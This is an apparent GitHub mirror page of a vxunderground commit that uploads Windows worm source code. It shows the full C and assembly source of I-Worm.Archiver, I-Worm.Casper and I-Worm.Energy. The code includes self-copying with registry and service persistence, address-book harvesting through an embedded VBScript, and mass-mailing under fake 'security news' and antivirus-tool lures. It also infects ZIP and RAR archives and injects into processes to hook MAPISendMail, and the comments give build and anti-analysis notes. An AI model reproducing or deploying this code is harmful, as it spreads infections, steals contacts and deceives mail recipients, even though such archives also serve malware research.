13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00

Add files via upload

This commit is contained in:
vxunderground 2020-10-09 22:25:52 -05:00 committed by GitHub
parent b7054dfedf
commit 4528c5fb12
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
23 changed files with 16566 additions and 0 deletions

BIN
Win32/Adrena.7z Normal file

Binary file not shown.

Binary file not shown.

BIN
Win32/ExploitKit.0x88.7z Normal file

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

1232
Win32/I-Worm.Alizee.asm Normal file

File diff suppressed because it is too large Load Diff

227
Win32/I-Worm.Archiver.c Normal file

@ -0,0 +1,227 @@
/*
Name : I-Worm.Archiver
Author : PetiK
Date : Mai 10th 2002 -
Language : C++
Comments : Infect ZIP files which run with WINZIP.
We can also to do the same think with PowerArchiver:
powerarc -a -c4 archive.zip virus.exe
*/
#include <windows.h>
#include <stdio.h>
#include <mapi.h>
#pragma argused
#pragma inline
char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
char *fnam[]={"news","support","info","newsletter","webmaster"};
char *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"};
LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
char attname[]="news_xxxxxxxx.exe";
LPTSTR cmdLine,ptr;
BOOL installed;
BYTE desktop[50],favoris[50],personal[50],winzip[50];
DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
DWORD type=REG_SZ;
long i;
LHANDLE session;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
HKEY hReg;
WIN32_FIND_DATA ffile;
void infzip(char *);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
GetModuleFileName(hInst,filen,100);
GetSystemDirectory((char *)sysdir,100);
GetWindowsDirectory((char *)copyn,100);
strcpy(windir,copyn);
strcat(copyn,"\\Archiver.exe");
installed=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
case 'p':
ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002",
"I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
ExitProcess(0);
break;
}
}
}
if(!installed) {
CopyFile(filen,copyn,FALSE);
strcpy(copyreg,copyn);
strcat(copyreg," -i");
/* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg); */
ExitProcess(0);
}
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
RegCloseKey(hReg);
if(strlen(winzip)!=0) {
infzip(windir);
infzip(sysdir);
infzip(desktop);
infzip(personal);
infzip(favoris);
infzip("C:\\");
}
/*
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
for(i=0;i<8;i++)
attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
fsubj[0]=0;
wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);
mes->ulReserved=0;
mes->lpszSubject=fsubj;
mes->lpszNoteText="This is some news send by our firm about security.\n"
"Please read by clicking on attached file.\n"
"\tBest Regards";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filen;
mes->lpFiles->lpszFileName=attname;
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
*/
ExitProcess(0);
}
void infzip(char *folder)
{
register bool abc=TRUE;
register HANDLE fh;
if(strlen(folder)!=0) {
SetCurrentDirectory(folder);
fh=FindFirstFile("*.zip",&ffile);
if(fh!=INVALID_HANDLE_VALUE) {
while(abc) {
inzip[0]=0;
wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
WinExec(inzip,1);
abc=FindNextFile(fh,&ffile);
}
}
}
}

1555
Win32/I-Worm.BigBrother.asm Normal file

File diff suppressed because it is too large Load Diff

510
Win32/I-Worm.Casper.asm Normal file

@ -0,0 +1,510 @@
;--- dllz.def
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA
;---
comment #
Name : I-Worm.Casper
Author : PetiK
Date : August 17th - August 24th
Size : 6144 byte (compressed with UPX tool)
Action : Copy itself to
* WINDOWS\MsWinsock32.exe
Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Winsock32 1.0 = WINDOWS\MsWinsock32.exe
To build the worm:
tasm32 /ml /m9 Casper
tlink32 -Tpe -c -x -aa Casper,,,import32,dllz
upx -9 Casper.exe
To delete the worm:
del %windir%\MsWinsock32.exe
del %windir%\CasperEMail.txt
dllz.def file:
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
Main_Worm:
call Hide_Worm
call Copy_Worm
call Check_Wsock
call Prepare_Spread_Worm
Connected_:
push 00h
push offset Tmp
callx InternetGetConnectedState
dec eax
jnz Connected_
mov edi,offset casper_mail
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"saC\"
stosd
mov eax,"Erep"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
call Spread_Worm
Hide_Worm proc
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz End_Hide
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz End_Hide
push 1
push 0
call ecx
End_Hide:
popad
ret
Hide_Worm endp
Check_Wsock proc
Search_Wsock:
push 50
mov edi,offset wsock_file
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"osW\"
stosd
mov eax,"23kc"
stosd
mov eax,"lld."
stosd
xor eax,eax
stosd
push offset wsock_file
callx GetFileAttributesA
cmp eax,20h
jne End_Wsock
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset wsock_file
callx CreateFileA
mov wsckhdl,eax
File_Mapping:
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push wsckhdl
callx CreateFileMappingA
test eax,eax
jz Close_File
mov wsckmap,eax
xor eax,eax
push eax
push eax
push eax
push 06h
push wsckmap
callx MapViewOfFile
test eax,eax
jz Close_Map_File
mov esi,eax
mov wsckview,eax
Old_Infect:
mov verif,0
cmp word ptr [esi],"ZM"
jne UnmapView_File
cmp byte ptr [esi+12h],"z"
je Infected_By_Happy
cmp word ptr [esi+38h],"ll"
je Infected_By_Icecubes
jmp UnmapView_File
Infected_By_Happy:
push 10h
push offset warning
@pushsz "I-Worm.Happy coded by Spanska"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Infected_By_Icecubes:
push 10h
push offset warning
@pushsz "I-Worm.Icecubes coded by f0re"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Already_Infected:
inc verif
jmp UnmapViewOfFile
UnmapView_File:
push wsckview
callx UnmapViewOfFile
Close_Map_File:
push offset wsckmap
callx CloseHandle
Close_File:
push wsckhdl
callx CloseHandle
End_Wsock:
ret
Check_Wsock endp
Copy_Worm proc
pushad
Original_Name:
push 50
mov esi,offset original
push esi
push 0
callx GetModuleFileNameA
Copy_Name:
mov edi,offset copy_name
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,'WsM\'
stosd
mov eax,'osni'
stosd
mov eax,'23kc'
stosd
mov eax,'exe.'
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
Reg_Registered:
push 08h
push edi
push 01h
@pushsz "Winsock32"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
push 08h
@pushsz "PetiK - France - (c)2001"
push 01h
@pushsz "Author"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
push 08h
@pushsz "1.00"
push 01h
@pushsz "Version"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
popad
ret
Copy_Worm endp
Prepare_Spread_Worm proc
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\CasperMail.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
push 1
@pushsz "wscript C:\CasperMail.vbs"
callx WinExec
push 3 * 1000
callx Sleep
@pushsz "C:\CasperMail.vbs"
callx DeleteFileA
popad
ret
Prepare_Spread_Worm endp
Spread_Worm:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset casper_mail
callx CreateFileA
inc eax
test eax,eax
je End_Spread_worm
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3
call Scan_Mail
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
End_Spread_worm:
popad
ret
Scan_Mail:
pushad
xor edx,edx
mov edi,offset m_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
je not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je Scan_Mail
call Send_Mail
jmp Scan_Mail
entr2: xor al,al
stosb
pop edi
jmp Scan_Mail
f_mail:
FIN: push 00h
callx ExitProcess
Send_Mail:
xor eax,eax
push eax
push eax
push eax
push offset Message
push [MAPIHdl]
callx MAPISendMail
ret
.data
; ===== Main_Worm =====
wsock_file db 50 dup (0)
; ===== Check_Wsock =====
wsckhdl dd 0
wsckmap dd 0
wsckview dd 0
PEHeader dd 0
warning db "Warning : You're infected by",00h
verif dd ?
; ===== Copy_Worm =====
original db 50 dup (0)
copy_name db 50 dup (0)
; ===== Prepare_Spread_Worm =====
octets dd ?
; ===== Spread_Worm =====
m_addr db 128 dup (?)
casper_mail db 50 dup (0)
mail_name db "Casper_Tool.exe",00h
MAPIHdl dd 0
Tmp dd 0
subject db "Casper Tool Protect 1.00",00h
body db "Hi,",0dh,0ah
db "Look at this attachment...",0dh,0ah
db "This freeware alert you if you infected by "
db "I-Worm.Happy and I-Worm.Icecubes.",0dh,0ah
db "These worms spread with the file WSOCK32.DLL in the SYSTEM path.",0dh,0ah
db "The tool Casper v.1.00 scans this specific file and displays a message "
db "if it infected.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"Good Bye and have a nice day",00h
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset original
dd offset mail_name
dd ?
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah
db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine "#"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd
MAX_PATH equ 260
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
Search WIN32_FIND_DATA <>
end DEBUT
end

1598
Win32/I-Worm.Chainsaw.asm Normal file

File diff suppressed because it is too large Load Diff

727
Win32/I-Worm.Energy.asm Normal file

@ -0,0 +1,727 @@
COMMENT #
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ I-Worm.Energy ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
hey all...
ÄÄÄÄÄÄÄÄÄÄÄ
it was one b0ring sunday, when I decided to code some small and kewl virus...
I was tired from coding large projectz (HIV, XTC)... I wanted to code one
worm with some nice ideaz, like the Win2k.Stream.
and here it is. after some meditationz, full of experiencez from psychedelics
I decided to call this worm "Energy"... it is very small worm, spreading via
RAR filez. it can parse all processes, hook there MAPISendMail API procedure
and infect all attached RAR filez in a message by dropping itself to there.
very similar technique of the process'es address space manipulationz is
described in my article "Multi-process residency" and Win32.HIV virus. surely
it can't work on Win95/98 systemz. it worx on Windows 2000 OS, and (perhaps)
also on earlier versionz of Windows NT - but I don't know, I haven't tested it.
it can stay resident in memory as a service, by standard API callz, valid only
in NT systemz. while infecting the RAR archivez it addz itself to there under
the "SETUP.EXE" filename, containing also the standard setup icon. I tried to
optimize the source a bit... I know the worm is not super-small, but I it is
resident heavilly armoured very effective tiny mail-spreading worm.
the scheme of execution:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
after execution:
- anti-* stuff
- if initialized by SCM, run as a service process
- copy worm to system directory as "ENERGY.EXE"
- register worm as service process and run it everytime the OS will start
- enum processes, find MAPI32.dll there and hook MAPSendMail (using many
trics)
- wait one minute and again
hook_procedure:
- parse embedded filez and search for RAR filez.
- infect them by worm file: SETUP.EXE, mark as read-only (already-infected
mark).
the worm is encrypted/compressed by "tElock, version 0.51", one very nice
utility for armouring executable filez. this protector containz many nice
anti-* featurez. that's why I decided to use it. and also becoz I think guyz at
AVP can't handle this one.
it is possible that worm containz some bugz. yeah, but I don't care... I'm glad
I was able to finish it in 2 dayz and that it was not b0ring. I had a fun.
If you would like to consult anything with me, feel free to contact me...
(c) 14th November 2000 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
Czech Republic ³ Benny / 29A ÀÄÄÄÄÄÄÄÄÄÄÄ¿
@ benny_29a@privacyx.com ³
@ http://benny29a.cjb.net ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
#
.586p
.model flat ;blablabla
extrn GetLastError:PROC ;needed APIz
extrn EnumProcesses:PROC
extrn OpenProcess:PROC
extrn VirtualProtect:PROC
extrn VirtualAllocEx:PROC
extrn VirtualFreeEx:PROC
extrn CloseHandle:PROC
extrn CreateRemoteThread:PROC
extrn WriteProcessMemory:PROC
extrn Sleep:PROC
extrn WaitForSingleObject:PROC
extrn GetModuleHandleA:PROC
extrn GetProcAddress:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn GetModuleFileNameA:PROC
extrn GetFileSize:PROC
extrn ReadFile:PROC
extrn VirtualFree:PROC
extrn VirtualAlloc:PROC
extrn SetFilePointer:PROC
extrn SetFileAttributesA:PROC
extrn OpenMutexA:PROC
extrn ExitThread:PROC
extrn GetSystemDirectoryA:PROC
extrn CopyFileA:PROC
;extrn OpenServiceA:PROC
;extrn DeleteService:PROC ;***debug only!
extrn OpenSCManagerA:PROC
extrn CreateServiceA:PROC
extrn CloseServiceHandle:PROC
extrn StartServiceCtrlDispatcherA:PROC
extrn RegisterServiceCtrlHandlerA:PROC
extrn SetServiceStatus:PROC
include useful.inc ;include filez
include win32api.inc
PROC_COUNT equ 40*4 ;number of processes
.data
db ? ;some data
.code
Start: ;worm code starts here
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
e_name: @pushsz 'EnErGy'
push 0
push 1
call OpenMutexA ;check if mutex is
test eax,eax ;created, if not,
je end_seh ;we are prob. debugged
push eax
call CloseHandle ;close its handle
jmp SVCRegister ;logging as a service
e_svc: push 256
mov esi, offset worm_name
push esi
push 0
call GetModuleFileNameA ;get path+filename of
;the worm
mov edi,offset sys_dir
push edi
push 256
push edi
call GetSystemDirectoryA ;get windowz system dir.
add edi,eax
mov al,'\'
stosb
mov eax,'rene'
stosd
mov eax,'e.yg'
stosd
mov eax,'ex'
stosd ;construct path+filename
pop edi
push 0
push edi
push esi
call CopyFileA ;copy worm to sys. dir.
call SVCCreate ;register as a service
push api_num
pop ecx
call @api_table
dd offset GetModuleHandleA ;adressez of APIz
dd offset GetProcAddress
dd offset VirtualProtect
dd offset CreateFileA
dd offset CloseHandle
dd offset WriteFile
dd offset GetFileSize
dd offset ReadFile
dd offset VirtualFree
dd offset VirtualAlloc
dd offset SetFilePointer
dd offset SetFileAttributesA
api_num = 12
@api_table:
pop ebx
call @api_dest ;addressez of variablez
dd offset _gmha ;that will hold APIz
dd offset _gpa
dd offset _vp
dd offset _cfa
dd offset _ch
dd offset _wf
dd offset _gfs
dd offset _rf
dd offset _vf
dd offset _va
dd offset _sfp
dd offset _sfaa
@api_dest:
pop esi
get_apiz:
dec ecx ;decrement counter
mov eax,[ebx+ecx*4]
mov eax,[eax+2]
mov eax,[eax]
mov edx,[esi+ecx*4]
mov [edx],eax ;store API address
test ecx,ecx
jne get_apiz
worm_loop:
mov ebx,offset tmp
push ebx
push PROC_COUNT
mov esi,offset proc_dump
push esi
call EnumProcesses ;enum all processez
dec eax
jne end_seh
mov ecx,[ebx] ;try this PID
p_check:lodsd
call proc_infect ;try to infect it
add ecx,-3
loop p_check ;try next PID
worm_wait:
push 60000
call Sleep ;wait one minute
jmp worm_loop ;and try again.
;infect processez
proc_infect Proc
pushad
push eax
push 0
push 2 or 8 or 10h or 20h or 400h
call OpenProcess ;get handle to process
xchg eax,ecx
jecxz end_proc_infect
mov ebx,ecx
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push virtual_end-Start
push 0
push ebx
call VirtualAllocEx ;allocate there memory
xchg eax,ecx ;for worm
jecxz end_proc_infect2
mov esi,ecx
push 0
push virtual_end-Start
push offset Start
push esi
push ebx
call WriteProcessMemory ;copy there worm body
dec eax
jne end_proc_infect3
lea edx,[esi+offset ThreadEntry-offset Start]
push eax
push eax
push eax
push edx
push eax
push eax
push ebx
call CreateRemoteThread ;create thread there
xchg eax,ecx
jecxz end_proc_infect3
push ecx
push -1
push ecx
call WaitForSingleObject ;wait for its termination
call CloseHandle ;and close its handle
jmp end_proc_infect2 ;and quit
end_proc_infect3:
push MEM_RELEASE
push 0
push esi
push ebx
call VirtualFreeEx ;release memory if failed
end_proc_infect2:
push ebx
call CloseHandle ;close handle to process
end_proc_infect:
popad
ret ;and quit
proc_infect EndP
;remote thread procedure
ThreadEntry Proc
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
call gdelta
gdelta: pop ebp ;get delta offset
@pushsz 'MAPI32.dll'
mov eax,12345678h
_gmha = dword ptr $-4
call eax ;get address of MAPI32.dll
xchg eax,ecx
jecxz end_seh ;quit if not loaded
@pushsz 'MAPISendMail'
push ecx
mov eax,12345678h
_gpa = dword ptr $-4
call eax ;get address of
xchg eax,ecx ;MAPISendMail API
jecxz end_seh
mov esi,ecx ;to ESI
lea eax,[ebp + tmp - gdelta]
push eax
push PAGE_READWRITE
push 5
push esi
mov eax,12345678h
_vp = dword ptr $-4
call eax ;release page protection
xchg eax,ecx
jecxz end_seh
call hook_api ;hook the API
end_seh:@SEH_RemoveFrame ;remove SEH frame
popad ;and quit
ret
;proc for API hooking
hook_api:
mov [ebp + old_MAPI_addr - gdelta],esi
push esi
lea edi,[ebp + old_MAPI_api - gdelta]
movsd
movsb ;save first bytez of API
pop edi
mov ebx,edi
lea eax,[ebp + MAPI_hooker - gdelta]
sub ebx,eax
neg ebx
add ebx,-5
mov al,0E9h
stosb
xchg eax,ebx
stosd ;overwrite by JMP <worm_api>
ret
;the API hooker
MAPI_hooker:
push 12345678h
old_MAPI_addr = dword ptr $-4 ;save the address of API
pushad
mov edi,[esp.cPushad] ;get ptr to message
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
push edi
mov ebx,[esp.cPushad.28]
mov ecx,[ebx+40] ;number of attachmentz
mov ebx,[ebx+44] ;ptr to file fieldz
f_parse:mov esi,[ebx+12]
lea edi,[ebp + arc_buffer - gdelta]
push edi
@copysz
dec edi
cmp byte ptr [edi-1],'\'
je over_slash
mov al,'\'
stosb
over_slash:
mov esi,[ebx+16]
@copysz
or [esi-5],20202020h ;lower case
cmp [esi-5],'rar.'
pop esi ;create path+filename
jne o_r ;quit if not RAR file
call infect_archive ;try to infect this file
o_r: sub ebx,-24
loop f_parse ;try another file in msg
pop edi
call @m_res
old_MAPI_api db 5 dup (90h)
@m_res: pop esi
movsd
movsb ;remove the API hooker
jmp end_seh ;and quit
;procedure for RAR archive infecting
infect_archive:
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
call gd
gd: pop ebp ;get delta offset
lea eax,[ebp + worm_name - gd] ;get worm filename
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push 0
push GENERIC_READ
push eax
call [ebp + _cfa - gd] ;open worm file
inc eax
je end_seh
dec eax
mov [ebp + hFile - gd],eax ;save handle
push 0
push eax
mov eax,12345678h
_gfs = dword ptr $-4
call eax ;get its size
push eax
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push eax
push 0
mov eax,12345678h
_va = dword ptr $-4
call eax ;allocate enough memory
test eax,eax
pop edx
je end_file
xchg eax,ebx
push edx
push 0
lea eax,[ebp + tmp - gd]
push eax
push edx
push ebx
push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_rf = dword ptr $-4 ;and copy there worm
call eax
call close_file ;close handle to file
pop edi
pushad
mov esi,ebx
call CRC32 ;calculate CRC32 of
mov [ebp + RARCRC32 - gd],eax ;the worm file
popad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push 0
push GENERIC_READ or GENERIC_WRITE
push esi
mov eax,12345678h
_cfa = dword ptr $-4
call eax ;open the archive
inc eax
je end_file2
dec eax
mov [ebp + hFile - gd],eax ;save its handle
push 2
push 0
push 0
push eax
mov eax,12345678h
_sfp = dword ptr $-4
call eax ;go to EOF
pushad
lea esi,[ebp + RARHeaderCRC+2 - gd]
push end_RAR-RARHeader-2
pop edi
call CRC32 ;calculate CRC32 of
mov [ebp + RARHeaderCRC - gd],ax ;the RAR file header
popad ;and save it
push 0
lea eax,[ebp + tmp - gd]
push eax
push end_RAR-RARHeader
call end_RAR
RARHeader: ;No comment ;)
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw end_RAR-RARHeader
RARCompressed dd 2000h
RAROriginal dd 2000h
RAROS db 0
RARCRC32 dd 0
RARFileDateTime dd 12345678h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw end_RAR-RARName
RARAttrib dd 0
RARName db 'SETUP.EXE'
end_RAR:
push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_wf = dword ptr $-4
call eax ;write RAR file header
push 0
lea eax,[ebp + tmp - gd]
push eax
push edi
push ebx
push dword ptr [ebp + hFile - gd]
call [ebp + _wf - gd] ;write the worm
end_file2:
push MEM_RELEASE
push 0
push ebx
mov eax,12345678h
_vf = dword ptr $-4
call eax ;release the memory
end_file:
call close_file ;close the archive
push FILE_ATTRIBUTE_READONLY
push esi
mov eax,12345678h
_sfaa = dword ptr $-4
call eax ;set READ-ONLY attribute
jmp end_seh ;and quit
close_file:
push 12345678h ;handle...
hFile = dword ptr $-4
mov eax,12345678h
_ch = dword ptr $-4
call eax ;close file handle
ret
CRC32 Proc
push ecx ;procedure for
push edx ;calculating CRC32s
push ebx ;at run-time
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
SVCHandler:
ret
CRC32 EndP
ThreadEntry EndP
;log on to SCM
SVCRegister Proc
call _dt
dd offset e_name+5
dd offset service_start
dd 0
dd 0
_dt: call StartServiceCtrlDispatcherA ;start service dispatcher
dec eax
jne e_svc ;quit if error (no service
;requestz)
push 0
call ExitThread ;terminate this thread
service_start: ;execution goes here...
